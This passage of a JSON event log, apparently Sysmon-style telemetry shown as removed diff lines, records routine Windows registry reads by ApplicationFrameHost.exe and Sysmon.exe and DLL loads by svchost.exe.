"process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - 
"unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": 
"{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250730000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573250890000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4052, - "process_name": "svchost.exe", - 
"process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "CapabilityAccessManager.dll", - "image_path": "C:\\Windows\\System32\\CapabilityAccessManager.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - 
"registry_value": "ButtonBackgroundColor", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250890000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573251050000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": 
